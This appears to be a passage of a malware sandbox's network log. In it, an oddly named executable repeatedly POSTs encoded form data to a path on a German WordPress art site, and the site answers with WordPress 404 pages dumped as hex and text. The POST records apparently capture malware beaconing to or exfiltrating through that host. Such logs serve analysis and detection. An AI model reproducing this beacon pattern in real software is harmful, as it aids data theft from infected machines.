            Sep 2, 2024 09:10:09.701950073 CEST1236INData Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
            Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
            Sep 2, 2024 09:10:09.701962948 CEST1236INData Raw: 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a
            Data Ascii: rything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp-block-site-logo-inline-css'>.wp-block-site-lo
            Sep 2, 2024 09:10:09.701973915 CEST1236INData Raw: 72 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 7d 2e 6c 69 6e 6b 2d 75 69 2d 62 6c 6f 63 6b 2d 69 6e 73 65 72 74 65 72 5f 5f 62 61 63 6b 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a
            Data Ascii: rter{padding-top:8px}.link-ui-block-inserter__back{margin-left:8px;text-transform:uppercase}.is-style-arrow-link .wp-block-navigation-item__label:after {content: "\2197";padding-inline-start: 0.25rem;vertical-align: mid
            Sep 2, 2024 09:10:09.701987028 CEST1236INData Raw: 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74
            Data Ascii: lign-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-
            Sep 2, 2024 09:10:09.702079058 CEST1236INData Raw: 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 72 61 67 72 61 70 68 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 69 73 2d 73 6d 61 6c 6c 2d
            Data Ascii: -right: auto;}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:l
            Sep 2, 2024 09:10:09.702130079 CEST1236INData Raw: 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 34 39 34 39 34 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b
            Data Ascii: appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max
            Sep 2, 2024 09:10:09.702142954 CEST1236INData Raw: 63 69 6e 67 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 69 6e 68 65 72 69 74 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62
            Data Ascii: cing:inherit;line-height:inherit;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search
            Sep 2, 2024 09:10:09.707034111 CEST1236INData Raw: 74 28 2e 69 73 2d 6e 6f 74 2d 73 74 61 63 6b 65 64 2d 6f 6e 2d 6d 6f 62 69 6c 65 29 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 7b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d
            Data Ascii: t(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-b


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            34192.168.2.649759162.55.254.209802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:10:11.831281900 CEST791OUTPOST /qpwk/ HTTP/1.1
            Host: www.anaidittrich.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.anaidittrich.com
            Referer: http://www.anaidittrich.com/qpwk/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 6a 74 6f 65 39 4a 2b 4f 79 6a 6e 68 39 5a 55 57 71 48 63 4a 6c 76 77 38 6b 46 65 6f 37 6d 4c 7a 77 64 46 4e 70 4b 6e 38 47 48 4c 73 75 6c 78 42 49 38 39 48 4b 31 55 49 64 67 5a 2b 44 6f 6b 36 76 58 71 4d 41 31 6b 4b 2f 42 30 35 4d 57 4f 65 46 4f 74 68 6b 47 6f 76 74 39 71 46 48 71 34 72 62 49 30 53 73 6c 53 5a 6d 4d 37 31 72 6b 4e 34 32 65 69 33 70 55 2f 6c 45 47 45 63 38 65 6b 72 73 4e 78 62 76 47 73 7a 51 63 42 51 6c 75 76 50 73 50 4e 61 59 48 77 35 4c 53 6c 43 31 6a 58 51 33 38 4c 41 4e 75 5a 43 71 67 51 2b 44 70 4c 68 49 47 6b 57 62 75 77 4b 77 3d 3d
            Data Ascii: cLqL3H=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Sojtoe9J+Oyjnh9ZUWqHcJlvw8kFeo7mLzwdFNpKn8GHLsulxBI89HK1UIdgZ+Dok6vXqMA1kK/B05MWOeFOthkGovt9qFHq4rbI0SslSZmM71rkN42ei3pU/lEGEc8ekrsNxbvGszQcBQluvPsPNaYHw5LSlC1jXQ38LANuZCqgQ+DpLhIGkWbuwKw==
            Sep 2, 2024 09:10:12.547661066 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:10:12 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
            Upgrade: h2c
            Connection: Upgrade, close
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
            Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
            Sep 2, 2024 09:10:12.547687054 CEST224INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
            Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht
            Sep 2, 2024 09:10:12.547698975 CEST1236INData Raw: 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20
            Data Ascii: gefunden. - Anai Dittrich Art, Design, Care</title><link rel='dns-prefetch' href='//anaidittrich.com' /><link rel="alternate" type="application/rss+xml" title="Anai Dittrich Art, Design, Care &raquo; Feed" href="http://anaidittrich.
            Sep 2, 2024 09:10:12.547723055 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 5b 74 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22
            Data Ascii: unction(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\
            Sep 2, 2024 09:10:12.547734976 CEST448INData Raw: 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79
            Data Ascii: number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof
            Sep 2, 2024 09:10:12.547749043 CEST1236INData Raw: 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d
            Data Ascii: rker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.e
            Sep 2, 2024 09:10:12.547764063 CEST1236INData Raw: 39 39 39 39 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63
            Data Ascii: 9999px}</style><style id='wp-block-site-title-inline-css'>:root :where(.wp-block-site-title a){color:inherit}</style><style id='wp-block-group-inline-css'>.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-lay
            Sep 2, 2024 09:10:12.548160076 CEST1236INData Raw: 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 31 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d
            Data Ascii: =writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([sty
            Sep 2, 2024 09:10:12.548173904 CEST1236INData Raw: 2e 36 38 34 68 31 2e 37 33 37 5a 27 29 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2a 20 48 69 64 65 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 69 66 20 74 68 65 20 68 65 61 64 69 6e 67
            Data Ascii: .684h1.737Z');display: block;}/* Hide the asterisk if the heading has no content, to avoid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;
            Sep 2, 2024 09:10:12.548187971 CEST1236INData Raw: 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 72 6c 22 5d 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f
            Data Ascii: right[style*="writing-mode:vertical-rl"]{rotate:180deg}</style><style id='wp-block-search-inline-css'>.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{h
            Sep 2, 2024 09:10:12.554428101 CEST1236INData Raw: 68 5f 5f 73 65 61 72 63 68 66 69 65 6c 64 2d 68 69 64 64 65 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
            Data Ascii: h__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-bloc


            Session IDSource IPSource PortDestination IPDestination Port
            35192.168.2.649760162.55.254.20980
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:10:15.833070040 CEST1804OUTPOST /qpwk/ HTTP/1.1
            Host: www.anaidittrich.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.anaidittrich.com
            Referer: http://www.anaidittrich.com/qpwk/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 69 35 6f 66 49 64 2b 50 56 50 6e 67 39 5a 55 4e 71 48 64 4a 6c 76 70 38 6b 39 53 6f 37 71 78 7a 79 31 46 43 72 53 6e 31 55 2f 4c 6e 75 6c 78 44 49 38 2b 4b 71 31 37 49 64 51 47 2b 43 55 6b 36 76 58 71 4d 43 42 6b 4b 75 42 30 2f 4d 57 4e 4a 31 4f 68 71 45 47 4d 76 74 6c 63 46 47 66 61 6f 76 45 30 53 4d 56 53 62 31 6b 37 33 4c 6b 50 37 32 65 36 33 70 49 4a 6c 45 61 6d 63 38 36 4b 72 73 70 78 62 59 6a 4b 32 55 63 2b 48 46 32 72 61 62 69 71 42 4f 4c 47 30 37 69 62 4f 57 2f 41 52 45 41 6b 47 4e 75 62 44 4c 6c 78 7a 51 68 65 69 2b 75 37 65 72 79 31 57 6d 6b 43 59 41 45 6d 68 4b 59 30 5a 32 4a 2f 66 6d 44 32 69 73 75 5a 31 54 62 2f 33 4b 6e 63 6f 4a 32 79 4b 78 62 70 74 4d 45 6f 51 61 33 56 72 7a 78 56 7a 48 63 38 71 50 52 61 6b 54 34 67 39 6b 36 4f 36 4c 4f 43 58 57 42 57 4d 43 50 56 74 2b 69 62 45 49 78 55 6d 36 4e 63 4a 30 31 7a 49 48 68 6e 69 56 34 43 2b 6f 64 [TRUNCATED]
            Data Ascii: cLqL3H=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Soi5ofId+PVPng9ZUNqHdJlvp8k9So7qxzy1FCrSn1U/LnulxDI8+Kq17IdQG+CUk6vXqMCBkKuB0/MWNJ1OhqEGMvtlcFGfaovE0SMVSb1k73LkP72e63pIJlEamc86KrspxbYjK2Uc+HF2rabiqBOLG07ibOW/AREAkGNubDLlxzQhei+u7ery1WmkCYAEmhKY0Z2J/fmD2isuZ1Tb/3KncoJ2yKxbptMEoQa3VrzxVzHc8qPRakT4g9k6O6LOCXWBWMCPVt+ibEIxUm6NcJ01zIHhniV4C+odZ7pbXQd2iNTgPF74sXCDQ4MRI96+bp78owfbTlH+v6uebnQbKMSYPogGB6tpYXT3TgS/y6NSwhFU3qtGlRxjJSkq13i7ldfbhaQx2SvGVFZr4+Re1B01yxt+BohY/s8ZpKN4ntGXPkucTcIE1hWuksCI+1S+ZsL2TFJd1B/8G4FUgOtxY1jbU4xOBrTKa+I5lmhqf3xuq4fGi66axYFgROpnDFpYwyIHFTpFS24F8BxOAfM22K0mW9GCBPYSoG2KYhHHz1B4FC4Zwe073htbI7ZrHTrhG2PL5OCNFQ2xXqO+xBw2LVxI4iVOObao47yeLDLXsXRKJ5b67Vt1xuhW/bpDv3LA3KRB4j1r1gwTz4MFoQ29BrPEggdAWtkCJcfFApw8pa/mEc2Uk+5btPLm6R+vtdxm2Ob3j09RgJFE3rvLRJM6rrKRncJ67LR1pbJwBCI5oCwPJeMS3Z54Ud4PXNMGXoz6cpo0A+cJWi5rz2fRN6r3IyiMT301f/XhxfDLl6OCKqEODyHyTdFIbaiUcB2z7GzSnsIo4jUj2LXs2a5Nxjl1XVAyJjpAH3Eo0IffiwwxeG5+zzYopDljmtzcn+7x8ghPdLL52feM5cBuKBSxwp4YeU01sLG7Ok2icclG7rqgkwXUwe2Z8dtkst+Rr/+CmaAKv8dCDe [TRUNCATED]
            Sep 2, 2024 09:10:16.588151932 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:10:16 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
            Upgrade: h2c
            Connection: Upgrade, close
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
            Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
            Sep 2, 2024 09:10:16.588171005 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
            Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
            Sep 2, 2024 09:10:16.588182926 CEST1236INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
            Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
            Sep 2, 2024 09:10:16.588201046 CEST672INData Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
            Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
            Sep 2, 2024 09:10:16.588212967 CEST1236INData Raw: 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d
            Data Ascii: rker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.e
            Sep 2, 2024 09:10:16.588224888 CEST1236INData Raw: 39 39 39 39 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63
            Data Ascii: 9999px}</style><style id='wp-block-site-title-inline-css'>:root :where(.wp-block-site-title a){color:inherit}</style><style id='wp-block-group-inline-css'>.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-lay
            Sep 2, 2024 09:10:16.588237047 CEST1236INData Raw: 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 31 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d
            Data Ascii: =writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([sty
            Sep 2, 2024 09:10:16.588251114 CEST1236INData Raw: 2e 36 38 34 68 31 2e 37 33 37 5a 27 29 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2a 20 48 69 64 65 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 69 66 20 74 68 65 20 68 65 61 64 69 6e 67
            Data Ascii: .684h1.737Z');display: block;}/* Hide the asterisk if the heading has no content, to avoid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;
